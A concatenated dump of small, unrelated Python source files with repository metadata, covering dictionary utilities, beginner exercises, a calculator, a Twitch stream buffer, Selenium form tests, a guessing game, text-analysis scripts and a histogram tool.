print ht.n_unique_kmers()
91f39f36c538a836cab0a08f180fdddc0c43d693 | Python | nathanawmk/fidesops | /src/fidesops/util/collection_util.py | UTF-8 | 1,023 | 3.5 | 4 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | from typing import List, Dict, TypeVar, Iterable, Callable
T = TypeVar("T")
U = TypeVar("U")
def merge_dicts(dictionaries: List[Dict[T, U]]) -> Dict[T, List[U]]:
    """Convert an iterable of dictionaries to a dictionary of iterables"""
    merged: Dict[T, List[U]] = {}
    for mapping in dictionaries:
        for key, value in mapping.items():
            merged.setdefault(key, []).append(value)
    return merged
def append(d: Dict[T, List[U]], key: T, val: U) -> None:
    """Append ``val`` to the list stored under ``key`` in ``d``.

    Falsy values (None, 0, "", empty collections) are deliberately ignored.

    append({}, "A", 1)         sets dict to {"A": [1]}
    append({"A": [1]}, "A", 2) sets dict to {"A": [1, 2]}
    """
    if val:
        d.setdefault(key, []).append(val)
def partition(_iterable: Iterable[T], extractor: Callable[[T], U]) -> Dict[U, List[T]]:
    """Partition a collection into buckets keyed by an arbitrary extractor function.

    Mirrors append()'s behaviour: falsy elements are skipped, although the
    extractor is still evaluated for them.
    """
    buckets: Dict[U, List[T]] = {}
    for element in _iterable:
        bucket_key = extractor(element)
        if element:
            buckets.setdefault(bucket_key, []).append(element)
    return buckets
| true |
e9d5aea8d1d45bde336e53f35679a46e4fa1a498 | Python | quintanaesc/CYPRobertoQE | /python/libro/problemasresueltos/capitulo2/problema2_10.py | UTF-8 | 751 | 4.15625 | 4 | [] | no_license | A=int(input("Introduce un entero positivo: "))
B=int(input("Introduce otro calor entero positivo: "))
C=int(input("Introduce un ultimo valor positivo:"))
# Report which of A, B, C is the maximum, mentioning ties explicitly.
if A>B:
    if A>C:
        print(f"A es el mayor con valor a {A}")
    elif A==C:
        print(f"A y C son iguales a {A} y son los mayores")
    else:
        print(f"C que vale {C} es el mayor")
elif A==B:
    if A>C:
        print(f"A y B son los mayores con valor {B}")
    elif A==C:
        print(f"A, B, y C son iguales con un valor de {A}")
    else:
        print(f"C es el mayor que vale {C}")
# From here on A < B, so only B and C remain candidates for the maximum.
elif B>C:
    print(f"B que vale {B} es el mayor")
elif B==C:
    print(f"B y C son los mayores con valor {B}")
else:
    print(f"C es el mayor con valor de {C}")
print("fin del programa")
| true |
94196c0d1de1fdc9ef7d17578ad6b1c9a0995229 | Python | EndyCat/Calculator | /main.py | UTF-8 | 1,117 | 3.65625 | 4 | [] | no_license | from colorama import init
from colorama import Fore, Back, Style
init()  # colorama: enable ANSI colour handling (needed on Windows consoles)
print(Back.CYAN)
print(Fore.BLACK)
print('Приветствую в калькуляторе!')
# Ask for the operation as a menu number: 1=+, 2=-, 3=*, 4=/.
x0 = str(input("Укажите действие которое хотите совершить (Укажите цифру рядом с которой стоит знак!)\n1. + (Плюс)\n2. - (Минус)\n3. *(Умножить)\n4. / (Делить)\n: "))
print(Back.YELLOW)
num1 = int(input("Введите первое число:"))
print(Back.RED)
num2 = int(input("Введите второе число:"))
print(Back.GREEN)
print("Ответ: ")
# NOTE(review): substring matching means input like "12" hits the "1" branch
# first — confirm single-digit input is assumed.
if "1" in x0:
    x1 = int(num1) + int(num2)
    print(x1)
elif "2" in x0:
    x2 = int(num1) - int(num2)
    print(x2)
elif "3" in x0:
    x3 = int(num1) * int(num2)
    print(x3)
elif "4" in x0:
    # True division: the result may be a float.
    x4 = int(num1) / int(num2)
    print(x4)
else:
    # Unknown menu choice: show an error and wait for Enter before exiting.
    print(Back.BLUE)
    print("Указаный знак не является верным, пожалуйста при вводе знака пишите число под которым он!")
    kkj = input()
| true |
d7439a42c5704fab441f59691b17366d9d171750 | Python | robagliom/debates_candidatos_2015 | /segundo_debate_político.py | UTF-8 | 3,414 | 3.15625 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
########### Módulos ##############
from preprocesamiento import *
from analisis import *
from test_legibilidad import *
from matriz_candidatos import *
from distancia_coseno import *
from combinaciones import *
from comparacion_macri import *
"""
########### Fin módulos ##############
diccionario = leer_archivo("datos/ArgentinaDebate_2.pdf") #Módulo específico
for i in diccionario:
print('Cantidad de palabras dichas por',i,': ',len(diccionario[i]),'\n')
#Porcentaje de las palabras totales dichas por cada candidato
labels = [i for i in diccionario]
sizes = [len(diccionario[i]) for i in diccionario]
colors = ['gold','red']
#explode = (0, 0, 0, 0) # explode 1st slice
# Plot
plt.pie(sizes, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.title("Porcentaje de las palabras totales dichas por cada candidato")
plt.show()
#ANÁLISIS MACRI
palabras_macri = tokenizacion(diccionario['Macri'])
#Frecuencia de distribución
plot_palabras_mas_usadas(palabras_macri, 'MACRI')
#WordCloud MACRI
plot_wordcloud(palabras_macri, 'MACRI')
#ANÁLISIS SCIOLI
palabras_scioli = tokenizacion(diccionario['Scioli'])
#Frecuencia de distribución
plot_palabras_mas_usadas(palabras_scioli,'SCIOLI')
#WordCloud MACRI
plot_wordcloud(palabras_scioli,'SCIOLI')
#TEST LEGIBILIDAD CANDIDATOS
#COMENTADO HASTA VER ALGO TEÓRICO QUE JUSTIFIQUE
#test_legibilidad(diccionario)
"""
###########################################################
######### ANÁLISIS DISCURSO SEPARADO POR SECCIÓN ##########
print('** Realizamos análisis separado por sección **')
dicc_por_seccion = leer_archivo_separado("datos/ArgentinaDebate_2.pdf")
######### SECCIÓN: DESARROLLO ECONÓMICO Y HUMANO ##########
desarrollo_eco_hum = dicc_por_seccion['Desarrollo económico y humano']['Diccionario']
#preprocesamiento_coseno2(desarrollo_eco_hum,"DESARROLLO ECONÓMICO Y HUMANO: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_eco_hum,"DESARROLLO ECONÓMICO Y HUMANO: palabras compartidas entre candidatos")
######### SECCIÓN: EDUCACIÓN E INFANCIA ##########
desarrollo_edu_inf = dicc_por_seccion['Educación e infancia']['Diccionario']
#preprocesamiento_coseno2(desarrollo_edu_inf,"EDUCACIÓN E INFANCIA: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_edu_inf,"EDUCACIÓN E INFANCIA: palabras compartidas entre candidatos")
######### SECCIÓN: SEGURIDAD Y DERECHOS HUMANOS ##########
desarrollo_seg_der = dicc_por_seccion['Seguridad y derechos humanos']['Diccionario']
print(desarrollo_seg_der)
#preprocesamiento_coseno2(desarrollo_seg_der,"SEGURIDAD Y DERECHOS HUMANOS: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_seg_der,"SEGURIDAD Y DERECHOS HUMANOS: palabras compartidas entre candidatos")
######### SECCIÓN: FORTALECIMIENTO DEMOCRÁTICO ##########
desarrollo_fort_dem = dicc_por_seccion['Fortalecimiento democrático']['Diccionario']
#preprocesamiento_coseno2(desarrollo_fort_dem,"FORTALECIMIENTO DEMOCRÁTICO: similitud candidatos por distancia del coseno")
#matriz_comparativa(desarrollo_fort_dem,"FORTALECIMIENTO DEMOCRÁTICO: palabras compartidas entre candidatos")
palabras_distintas(leer_archivo_separado("datos/Version-taquigrafica.pdf"),dicc_por_seccion) | true |
6f4df8f0c58c06b5ae7c61f4f5a8bb4ed65824ab | Python | dimorinny/twitch-fragment-upload | /twitch.py | UTF-8 | 2,729 | 2.640625 | 3 | [] | no_license | from concurrent.futures import ThreadPoolExecutor
from livestreamer import Livestreamer
from buffer import RingBuffer
from error import StreamBufferIsEmptyException
class Twitch(object):
    """Wraps a livestreamer Twitch stream and buffers its raw bytes in a RingBuffer."""
    # livestreamer option / plugin identifiers used by _init_stream().
    RING_BUFFER_SIZE_KEY = 'ringbuffer-size'
    OAUTH_TOKEN_KEY = 'oauth_token'
    LIVESTREAMER_PLUGIN_TWITCH = 'twitch'
    def __init__(self, buffer_size, resolution, oauth, channel):
        """Store connection parameters; the stream itself is opened lazily by initialize()."""
        self.oauth = oauth
        self.resolution = resolution
        self.channel = channel
        self.buffer_size = buffer_size
        self.buffer = RingBuffer(
            buffer_size=buffer_size
        )
        self.initialized = False
        self.stream = None
    def __del__(self):
        # Close the underlying stream handle when the wrapper is garbage-collected.
        if self.initialized:
            self.stream.close()
    def initialize(self):
        """(Re)open the stream and reset the buffer.

        Leaves ``initialized`` False when no stream matches the requested resolution.
        """
        self.buffer.clear()
        stream = self._init_stream(self.oauth, self.channel)
        if stream:
            self.initialized = True
            self.stream = stream.open()
    def get_stream_data(self):
        """Return everything currently buffered.

        If the stream is not open yet, attempt to open it and signal the
        caller via StreamBufferIsEmptyException.
        """
        if not self.initialized:
            print('Read: Try to initialize')
            self.initialize()
            raise StreamBufferIsEmptyException
        return self.buffer.read_all()
    def update_stream_data(self):
        """Read the next chunk from the stream into the buffer.

        Re-initializes the stream on EOF (zero bytes read) or when it was
        never opened.
        """
        if self.initialized:
            data = self.stream.read(self.buffer_size)
            print('Update: {length}'.format(length=len(data)))
            if len(data) != 0:
                self.buffer.write(data)
            else:
                # Zero bytes read: the stream ended, try to reconnect.
                print('Update: Try to initialize')
                self.initialize()
        else:
            print('Update: Try to initialize')
            self.initialize()
    def stream_initialized(self):
        """Return True once a stream object has been opened."""
        return self.stream is not None
    def _init_stream(self, oauth, channel):
        """Create a livestreamer session and return the stream matching
        the requested resolution, or None when unavailable."""
        session = Livestreamer()
        session.set_plugin_option(
            self.LIVESTREAMER_PLUGIN_TWITCH,
            self.OAUTH_TOKEN_KEY,
            oauth
        )
        session.set_option(self.RING_BUFFER_SIZE_KEY, self.buffer_size)
        streams = session.streams(self._generate_stream_url(channel))
        return streams.get(self.resolution)
    @staticmethod
    def _generate_stream_url(channel):
        """Build the public channel URL livestreamer expects."""
        return 'https://www.twitch.tv/{channel}'.format(channel=channel)
class AsyncTwitchWrapper(object):
    """Runs the blocking Twitch read/update calls in a thread pool so they can be awaited."""
    def __init__(self, loop, twitch):
        self.executor = ThreadPoolExecutor()
        self.loop = loop
        self.twitch = twitch
    def initialize(self):
        # Synchronous pass-through; blocks the calling thread.
        self.twitch.initialize()
    async def get_stream_data(self):
        """Awaitable version of Twitch.get_stream_data (runs in the executor)."""
        return await self.loop.run_in_executor(self.executor, self.twitch.get_stream_data)
    async def update_stream_data(self):
        """Awaitable version of Twitch.update_stream_data (runs in the executor)."""
        await self.loop.run_in_executor(self.executor, self.twitch.update_stream_data)
| true |
55e129c4a43339457e1ec99edc8110f486a318af | Python | juselius/python-tutorials | /TextParsing/manyfiles/grabnumbers.py | UTF-8 | 410 | 2.96875 | 3 | [] | no_license | import os
# Scan every entry of the current directory for lines beginning with
# "WR12L2C2" and collect the 6th whitespace-separated token as a float.
filenames = os.listdir(".")
#print filenames
runtimes = list()
for f in filenames:
    # NOTE(review): os.listdir also returns this script and any
    # subdirectories; file() on a directory would raise IOError — confirm
    # the working directory holds only the expected data files.
    for line in file(f, "r").readlines():
        if line.startswith("WR12L2C2"):
            #print line
            linetokens = line.strip().split()
            #print linetokens[5]
            runtimes.append(float(linetokens[5]))
runtimes.sort()
# Smallest and largest collected runtime.
print "min=", runtimes[0], "max=", runtimes[-1]
e503f2617ec2af07868cfb1ab653893f39bca29d | Python | silverhorn/AutomationTestPython | /firsttest.py | UTF-8 | 4,822 | 3.375 | 3 | [] | no_license | from selenium import webdriver
import time
import unittest
# Bug fix: the tests below instantiate `Firstassessment`, but the class was
# imported as `Firstassessmen` (missing the trailing "t"), so every test died
# with a NameError. Import the name the tests actually use.
from pomfirstpage import Firstassessment
"""
This class consist of tests. It inherits unittest.TestCase class. Also consist setUp and tearDown methods which are
used to set up test with necessarily preconditions which will be executed before each test and to set up conditions
which will be executed after each test
"""
class CheckTest(unittest.TestCase):
    """UI tests for the ultimateqa "filling out forms" page.

    setUp/tearDown create and dispose of a fresh Chrome driver around every test.
    """
    baseURL = "https://www.ultimateqa.com/filling-out-forms/"  # page under test
    basePath = "C:/Python37-32/automation/driver/chromedriver.exe"  # chromedriver location
    def setUp(self):
        # Bug fix: setUp was decorated with @classmethod while being declared
        # with `self`, so the driver was stored on the class rather than on
        # each test instance. unittest calls setUp as a plain instance method.
        self.driver = webdriver.Chrome(self.basePath)
        self.driver.implicitly_wait(5)  # implicit wait for element lookups
        self.driver.maximize_window()
    def tearDown(self):
        self.driver.quit()
    def test_check_valid(self):
        """Submit the form with a wrong captcha result (-1) and verify that the
        sum expression is regenerated after submitting."""
        driver = self.driver
        driver.get(self.baseURL)
        FirstCheck = Firstassessment(driver)
        TextBeforeSubmit = FirstCheck.textBeforeAndAfterSubmit()
        print(TextBeforeSubmit)
        FirstCheck.TextBoxName("Test")
        FirstCheck.TextBoxMessage("Test")
        FirstCheck.TextBoxWrongCaptcha("-1")
        FirstCheck.SubmitButton()
        TextAfterSubmit = FirstCheck.textBeforeAndAfterSubmit()
        print(TextAfterSubmit)
        if TextBeforeSubmit != TextAfterSubmit:
            print("Numbers have changed")
        else:
            print("Numbers have not changed")
        time.sleep(2)
    def test_check_validtwo(self):
        """Solve the captcha sum correctly and verify the success message is shown."""
        driver = self.driver
        driver.get(self.baseURL)
        SecondCheck = Firstassessment(driver)
        textBeforeSubmitForm = SecondCheck.textBeforeAndAfterSubmit()
        print(textBeforeSubmitForm)
        # The captcha text looks like "X + Y = ?": the operands are the first
        # and third whitespace-separated tokens.
        captcha_list = textBeforeSubmitForm.split(' ')
        captchacorectnumber = int(captcha_list[0]) + int(captcha_list[2])
        print(captchacorectnumber)
        SecondCheck.TextBoxName("Test")
        SecondCheck.TextBoxMessage("Test")
        SecondCheck.BoxCapture(captchacorectnumber)
        SecondCheck.SubmitButton()
        message = SecondCheck.SuccessMessage()
        print(message)
        time.sleep(4)
time.sleep(4)
if __name__ == '__main__':
unittest.main() | true |
d390ade48721f90135c493fa7c95a58a735de80e | Python | alexyeet/guess-a-number | /guess_a_number.py | UTF-8 | 1,581 | 3.765625 | 4 | [] | no_license | import random
import math
# Configuration: guessing range and guess budget.
low=1
high=100
# ceil(log2(range size)): binary search needs at most this many guesses.
limit=round(math.log(high-low+1, 2) +.5)
# Welcome screen.
print ("welcome 2 g u e s s a n u m b e r")
# get_guess below converts the typed guess to an int.
def get_guess():
    """Prompt until the user types a whole number; return it as an int."""
    while True:
        raw = input("take a guess: ")
        if not raw.isnumeric():
            print("hey dude it's gotta be a number")
            continue
        return int(raw)
#play game
def play_again():
    """Ask the player y/n; return True to play another round, False to quit."""
    while True:
        answer = input("wanna play again? (y/n)").lower()
        if answer in ("y", "yes"):
            return True
        if answer in ("n", "no"):
            return False
        print("i'm confused please say 'y' or 'n'")
# Outer loop: one iteration per full game round.
again=True
while again:
    # Game start: pick the secret number and show the rules.
    print ("u got " + str(limit) + " guesses")
    rand = random.randint(low, high)
    print("i'm thinking of a number from "+str(low)+" to "+str(high)+".");
    guess = -1
    tries = 0
    # Guess loop: runs until the number is found or the budget is spent.
    while guess != rand and tries < limit:
        guess = get_guess()
        if guess < rand:
            print("too low")
        elif guess > rand:
            print("too high")
        tries += 1
    # Game end: win/lose messages, then offer another round.
    if guess == rand:
        print ("yeet u did it")
        print ("u should be a medical terminologist")
    else:
        print ("ur dumb as bricks it was actually " +str(rand))
        print ("try taking medical terminology then try again :/")
    again=play_again()
print ("see ya later")
| true |
76d519bf223668f16583334383196a975539db91 | Python | Jodiac92/pypro1 | /pack1/test1.py | UTF-8 | 907 | 3.6875 | 4 | [] | no_license | '''
여러줄 주석
'''
from builtins import isinstance
"""
여러줄 주석
"""
# One-line comment example.
# Variables are references; a name can be rebound to values of any type.
var1 = '안녕파이썬'
print(var1)
var1 = 5; print(var1)      # same name rebound to an int ...
var1 = 1.5; print(var1)    # ... and then to a float
a = 10; b = 20.5
c = b
print(a,b,c)
print(id(a),id(b),id(c))   # b and c reference the same object here
c = 10
print(a is b, a == b)      # 'is' compares identity, '==' compares value
print(a is c, a == c)      # after rebinding, a == c; 'is' depends on int caching
A = 10
a = 5
print(A, ' ', a)           # names are case sensitive: A and a are different
print('-----------------------')
import keyword
print('키워드 목록 : ',keyword.kwlist)
print('-----------------------')
print(10, oct(10), hex(10), bin(10))   # base conversions of the value 10
print(10, 0o12, 0xa, 0b1010)           # the same value written as literals
print('type(자료형) ------------')
print(7,type(7))
print(7.1,type(7.1))
print(7 + 2j,type(7 + 2j))
print(True,type(True))
print('a',type('a')) # 'a', "a"
print()
print((1,),type((1,)))     # one-element tuple needs the trailing comma
print([1],type([1]))
print({1},type({1}))
print({'k':1},type({'k':1}))
a = 5
print(isinstance(a, int))
print(isinstance(a, list)) | true |
b5db8e790e549c1e7f672bfadb4ca484df92a760 | Python | KseniaMIPT/Adamasta | /1sem/lab5/Z4.py | UTF-8 | 404 | 3.328125 | 3 | [] | no_license | A = [1,2,3,4,5,6,7]
# Task 1: swap each adjacent pair in-place (a trailing odd element stays put).
for i in range(0, len(A) - len(A) % 2, 2):
    A[i], A[i +1] = A[i + 1], A[i]
print(A)
# Task 2: cyclic shift right by one (prepend the last element, drop it when printing).
A = [1, 2, 3, 4, 5]
A.insert(0,A[-1])
print(A[:-1])
# Task 3: print the elements that occur exactly once.
A = [1,2,2,2,3,3,34,8]
B = str()  # NOTE(review): B is never used afterwards
for i in range(len(A)):
    if A.count(A[i]) == 1:
        print(A[i])
# Task 4: find the highest occurrence count of any element.
A = [1, 2, 3, 2, 3, 3]
a = -1
max = 0  # NOTE(review): shadows the built-in max() for the rest of the module
for i in range(len(A)):
    a += 1
    b = A.count(A[a])
    if b > max:
        max = b
print(max)
| true |
c317c6bb1470df9bfaea57817175935ca8ef11eb | Python | bitterengsci/algorithm | /九章算法/String问题/78.Longest Common Prefix.py | UTF-8 | 957 | 3.546875 | 4 | [] | no_license | #-*-coding:utf-8-*-
'''
Description
Given k strings, find the longest common prefix (LCP).
'''
class Solution:
    """
    @param strs: A list of strings
    @return: The longest common prefix
    """
    def longestCommonPrefix(self, strs):
        """Return the longest common prefix of strs ('' for an empty list).

        Character-by-character scan that stops at the FIRST position where
        the strings disagree.  Bug fix: the original kept scanning after a
        mismatch, so it could glue together non-contiguous matching
        characters (e.g. ["aXc", "aYc"] wrongly produced "ac").
        """
        if not strs:
            return ""
        if len(strs) == 1:
            return strs[0]
        prefix = ""
        min_len = min(len(s) for s in strs)
        for i in range(min_len):
            ch = strs[0][i]
            if all(s[i] == ch for s in strs[1:]):
                prefix += ch
            else:
                break  # first mismatch ends the common prefix
        return prefix

    def longestCommonPrefix2(self, strs):
        """Index-based variant: advance `end` while all strings agree there."""
        if len(strs) <= 1:
            return strs[0] if len(strs) == 1 else ""
        end, minl = 0, min(len(s) for s in strs)
        while end < minl:
            for i in range(1, len(strs)):
                if strs[i][end] != strs[i - 1][end]:
                    return strs[0][:end]
            end += 1
        return strs[0][:end]
| true |
a7d1db45143b5130c2ad0ce05d65c289e83804bc | Python | matheusgomes28/PapApp | /frontend/model_hist.py | UTF-8 | 5,008 | 3.375 | 3 | [] | no_license | """model_hist.py
Python script for creating a model histogram. Given
a image directory, it will load all the images and
calculate the mean histogram of the loaded images.
If givne a file instead, it will use the function in
the file as the generator for the histogram.
Usage:
model_hist.py --dir=DPATH
model_hist.py --file=FPATh
model_hist.py -h | --help
Options:
-d DPATH --dir=DPATH Indicate the image directory to use.
-f FPATH --file=FPATH Indicate the file path to use.
"""
# Impor the files package
import os, sys
sys.path.append(os.path.abspath("../"))
from utils import files
# Import for the CLI
from docopt import docopt
from colorama import Fore, Style, init
# The standard imports from fronend package
from frontend import analysis as an
from frontend import utilities as ut
# For the maths stuff
import numpy as np
from matplotlib import pyplot as plt
def loading_bar(current, N, size=20):
    """
    Simple loading bar for command lines.
    Should work well on unix systems.
    Args:
        current - Current index in iteration (0-based).
        N - Last possible index.
        size - Size of loading bar in chars.
    """
    # Bug fix: the parameter was spelled `curent` while the body used
    # `current`, so every call raised NameError.
    perc = (current+1)/N
    bar = int(np.round(perc*size))
    line = "Processing ["
    line += "="*bar + " "*(size-bar)
    line += "] {:d}%".format(int(np.round(perc*100)))
    ut.update_line(line)  # handles the carriage-return / in-place redraw
    # Note everything is printed to sys.out
def main():
    """
    Main entry point.

    Parses CLI args with docopt (colorama for coloured output), then either:
      * --dir:  average the normalised grey-level histograms of every image
                in the directory and save the result to model_hist.txt, or
      * --file: evaluate a user-supplied expression over X = 0..255 to build
                a histogram, normalise it and save it to model_hist.txt.
    """
    ######################
    ## ARGUMENT PARSING ##
    ######################
    args = docopt(__doc__)
    init()  # init colorama (Windows ANSI support)
    print("Arguments passed")
    dir_text = "Use directory? "
    if args["--dir"]:
        dir_text += "YES, " + args["--dir"]
    else:
        dir_text += "NO"
    file_text = "Use file? "
    if args["--file"]:
        file_text += "YES, " + args["--file"]
    else:
        file_text += "NO"
    print(Fore.GREEN + dir_text)
    print(file_text)

    #############################
    ## IMAGE DIRECTORY LOADING ##
    #############################
    if args["--dir"]:
        # Parse the path and make sure it exists.
        path = files.abspath(args["--dir"])
        if not files.exists(path):
            print(Fore.RED + "Path does not exist. Exiting.." + Style.RESET_ALL)
            sys.exit()
        img_paths = files.get_images(path)
        num_images = len(img_paths)
        # Accumulator: one row of 256 intensity bins per image.
        hist_acc = np.zeros((num_images, 256))
        print(Fore.BLUE + "Number of images to load: {}".format(num_images))
        for i, img_path in enumerate(img_paths):
            # Load in greyscale and store the image's normalised histogram.
            image = ut.read_image(img_path, "BGR2GRAY")
            hist = an.get_histogram(image)
            hist /= np.sum(hist)
            hist_acc[i, :] = np.ravel(hist)
        # The model histogram is the per-bin mean over all images.
        model_hist = np.mean(hist_acc, axis=0)
        # Plot and save the result.
        fig = plt.figure(figsize=(5, 2))
        ax1 = plt.gca()
        ax1.set_title("Histogram obtained")
        ax1.plot(model_hist)
        fig.tight_layout()
        plt.show()
        np.savetxt("model_hist.txt", model_hist)

    ###########################
    ## FILE FUNCTION LOADING ##
    ###########################
    if args["--file"]:
        # Again, parse the path and make sure the file exists.
        path = files.abspath(args["--file"])
        if not files.exists(path):
            print(Fore.RED + "File does not exist. Exiting.." + Style.RESET_ALL)
            sys.exit()  # bug fix: previously fell through and crashed on open()
        X = np.arange(256)  # sample points [0, 255], usable by the expression
        with open(path, 'r') as f:
            expr = f.read().strip()
            try:
                # SECURITY: eval() executes arbitrary code from the file —
                # only feed it trusted function files.
                Y = eval(expr)
                # Normalise and save the histogram.
                Y = Y / np.sum(Y)
                np.savetxt("model_hist.txt", Y)
            except SyntaxError:  # malformed expression in the file
                print("Invalid syntax in the function file. Exiting.")
                sys.exit()
            except NameError:  # unknown variable name in the expression
                print("Undefined name given in function file. Exiting")
                sys.exit()
        # Plot the generated histogram.
        fig = plt.figure(figsize=(5, 2))
        ax1 = plt.gca()
        ax1.set_title("Histogram Created")
        ax1.plot(Y)
        fig.tight_layout()
        plt.show()
# Init method
if __name__ == "__main__":
main()
| true |
fa15ba9f3fd79efa90e380a0dd80f40a7fa2df99 | Python | DmSide/DmSide-ai_code_analysis_tools | /source_code/lib/tools.py | UTF-8 | 31,555 | 2.625 | 3 | [] | no_license | # """useful features"""
import re
import os
import sys
import traceback
# import iso639
# import requests
# import json
import numpy
import difflib
# import string
import ctypes
from itertools import permutations, product
# from lib.text import Text
#
# # from lib.mongo_connection import MongoConnection
#
# punctuation = '[!"#$%&\\\'()*+,-./:;<=>?@[\\]^_`{|}~]'
#
# def sample_update_matches(back_map, origin_text, matches):
# # origin_text MUST BE unicode type. In other case we have the wrong length of string and position of words
# utf_origin_text = origin_text # if isinstance(origin_text, unicode) else origin_text.decode('utf-8')
# for match in matches:
# start_match = match['start_match']
# match['start_match'] = int(back_map[start_match])
# match['length_match'] = int(back_map[start_match + match['length_match'] - 1] - match['start_match'] + 1)
# match['word'] = utf_origin_text[match['start_match']: match['start_match'] + match['length_match']]
# return matches
#
#
# def sample_strip(samples):
# """removes spaces at the beginning and at the end"""
# if isinstance(samples, list):
# result = []
# for sample in samples:
# result.append(sample.strip())
# return result
# # if isinstance(samples, str) or isinstance(samples, unicode):
# if isinstance(samples, str): # Add SIDE(PY3)
# return samples.strip()
# return samples
#
#
# def delete_in_sample(sample, start, count):
# """removes "count" elements from the "start" index"""
# end = start + count - 1
# string = sample['string']
# if len(string) < start + count or start < 0 or count <= 0:
# return sample
# new_sample = {}
# new_matches = []
# for match in sample['matches']:
# sm = match['start_match']
# lm = match['length_match']
# rm = sm + lm - 1
# new_match = {}
# if start < sm:
# new_start_match = start if end >= sm - 1 else sm - count
# else:
# new_start_match = sm
# if end < sm or start > rm:
# new_match['start_match'] = new_start_match
# new_match['length_match'] = lm
# new_matches.append(new_match)
# else:
# new_length_match = ((rm - end) if (rm > end) else 0) + ((start - sm) if (sm < start) else 0)
#
# if new_length_match > 0:
# new_match['start_match'] = new_start_match
# new_match['length_match'] = new_length_match
# new_matches.append(new_match)
#
# new_sample['matches'] = new_matches
# new_sample['string'] = string[:start]+string[start+count:]
# return new_sample
#
#
# def sample_strip_and_recalc_matches(sample):
# """removes spaces at the beginning and at the end AND recalc matches"""
# ret_sample = sample
# string = sample["string"]
# len_string = len(string)
# zeros_left = len_string - len(string.lstrip())
# zeros_right = len_string - len(string.rstrip())
# if zeros_right > 0:
# ret_sample = delete_in_sample(ret_sample, len_string - zeros_right, zeros_right)
# if zeros_left > 0:
# ret_sample = delete_in_sample(ret_sample, 0, zeros_left)
# return ret_sample
#
#
# def sample_remove_tabs(origin_text, result='map', mode='min'):
# """Remove tabs and multiple spaces"""
# if mode == 'min':
# tab = '\t'
# else:
# tab = '\s'
# new_text = re.sub(tab, ' ', origin_text)
# new_text = re.sub(' +', ' ', new_text)
# if result == 'map':
# skip_map = check_skip_string(new_text, origin_text)
# back_map = numpy.where(numpy.array(skip_map) == 0)[0]
# return new_text, back_map
# elif result == 'skip':
# skip_map = check_skip_string(new_text, origin_text)
# return new_text, skip_map
# else:
# return new_text
#
#
# def fixing_line_breaks(text):
# return re.sub('[\n\r\f]+', '.', text)
#
#
# def adaptiv_remove_tab(origin_text):
# punctuation_sign = '[!"#$%&\'()*+,-\./:;<=>?@[\\]^_`{|}~]'
# tab = '[\n\r\f]'
#
# end = 0
# new_text = ''
# for match in re.finditer('{0}{1}+'.format(punctuation_sign, tab), origin_text):
# # b = match.regs[0] # Delete SIDE(PY3)
# b = match.span() # Add SIDE(PY3)
# new_text += origin_text[end:(b[0] + 1)] + ' '*(b[1] - b[0] - 1)
# end = b[1]
# new_text += origin_text[end:]
# fixed_text = new_text
#
# end = 0
# new_text = ''
# for match in re.finditer('{1}+(?={0})'.format(punctuation_sign, tab), fixed_text): # ' '
# # b = match.regs[0] # Delete SIDE(PY3)
# b = match.span() # Add SIDE(PY3)
# new_text += fixed_text[end:(b[0])] + ' ' * (b[1] - b[0] - 1)
# end = b[1]
# new_text += fixed_text[end:]
# fixed_text = new_text
#
# end = 0
# new_text = ''
# for match in re.finditer('{1}+(?!{0})'.format(punctuation_sign, tab), fixed_text): # '.'
# # b = match.regs[0] # Delete SIDE(PY3)
# b = match.span() # Add SIDE(PY3)
# new_text += fixed_text[end:(b[0])] + '.' + ' ' * (b[1] - b[0] - 1)
# end = b[1]
# new_text += fixed_text[end:]
# fixed_text = new_text
#
# new_text = re.sub(' +', ' ', fixed_text)
# skip_map = check_skip_string(new_text, fixed_text)
# back_map = numpy.where(numpy.array(skip_map) == 0)[0]
# return new_text, back_map
#
#
# def remove_tab(origin_text):
# tab = '\s'
# fixed_text = re.sub(tab, ' ', origin_text)
# new_text = re.sub(' +', ' ', fixed_text)
# skip_map = check_skip_string(new_text, fixed_text)
# back_map = numpy.where(numpy.array(skip_map) == 0)[0]
# return new_text, back_map
#
#
# def fixe_samples_match(skip_map, origin_matches):
# matches = []
# if sum(skip_map) > 0:
# shift_map = numpy.cumsum(skip_map)
# for match in origin_matches:
# new_match = {}
# start_origin = match['start_match']
# new_match['start_match'] = start_origin - shift_map[start_origin]
# end_origin = start_origin + match['length_match'] - 1
# new_match['length_match'] = end_origin - shift_map[end_origin] - new_match[
# 'start_match'] + 1
# matches.append(new_match)
# else:
# matches = list(origin_matches)
# return matches
#
#
# def to_lower(text):
# if isinstance(text, str):
# return text.lower() # Add SIDE(PY3)
# # return string.lower(text) # Delete SIDE(PY3)
#
# # if isinstance(text, unicode): # Delete SIDE(PY3)
# # return unicode.lower(text) # Delete SIDE(PY3)
# return text
#
#
# def sort_model(models, tag='type'):
# """groups models by type"""
# result_set = {}
# for model in models:
# if model[tag] not in result_set:
# result_set[model[tag]] = [model]
# else:
# result_set[model[tag]].append(model)
# return result_set
#
#
# def get_abs_path(path):
# """"""
# path = path if os.path.isabs(path) else \
# os.path.abspath(
# os.path.join(
# os.path.dirname(os.path.dirname(sys.modules['nlp.config'].__file__)),
# path
# )
# )
# return path
#
#
# def find_nth_overlapping(haystack, needle, n):
# """find n-ed entrance needle to haystack"""
# start = -1
# while start >= 0 and n > 0:
# start = haystack.find(needle, start+1)
# n -= 1
# return start
#
#
# def search_positions_entity(entity):
# """Search positions entity in polyglot.entities"""
# pos_token = 0
# entry = 0
# for token in entity.parent.tokens:
# if pos_token == entity.start:
# break
# if token == entity.parent.tokens[entity.start]:
# entry += 1
# pos_token += 1
# start = find_nth_overlapping(entity.parent.row, entity.parent.tokens[entity.start], entry + 1)
#
# if len(entity._collection) > 1:
# pos_token = 0
# entry = 0
# for token in entity.parent.tokens:
# if pos_token == (entity.end-1):
# break
# if token == entity.parent.tokens[entity.end-1]:
# entry += 1
# pos_token += 1
# start_lost = find_nth_overlapping(entity.parent.row, entity.parent.tokens[entity.end-1], entry + 1)
# end = start_lost + len(entity.parent.tokens[entity.end-1])
# else:
# end = start + len(entity.parent.tokens[entity.start])
# return start, end
#
#
# def search_positions_word(word, index_word, polyglot_text):
# """Search positions entity in polyglot.words"""
# pos_token = 0
